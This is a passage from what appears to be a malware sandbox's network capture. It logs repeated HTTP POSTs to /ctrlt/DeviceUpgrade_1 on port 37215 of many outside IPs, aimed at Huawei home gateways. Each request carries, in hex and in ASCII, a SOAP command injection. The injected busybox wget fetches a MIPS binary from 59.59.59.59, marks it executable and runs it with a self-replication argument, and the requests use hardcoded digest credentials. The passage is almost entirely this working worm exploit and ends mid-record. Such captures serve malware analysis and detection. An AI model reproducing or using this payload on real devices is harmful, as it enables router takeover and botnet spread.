                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          532192.168.2.155673013.255.227.17837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.618433952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          533192.168.2.154008441.208.2.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.621547937 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          534192.168.2.154322435.167.50.13237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.621602058 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          535192.168.2.153760841.14.194.22837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.622633934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          536192.168.2.1539838197.59.191.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.622705936 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          537192.168.2.1541066157.163.111.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.623022079 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          538192.168.2.1553656157.102.255.21137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.623159885 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          539192.168.2.155424441.174.146.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.623327017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          540192.168.2.1539758119.57.43.9637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.623424053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          541192.168.2.1544462157.37.1.17637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.626761913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 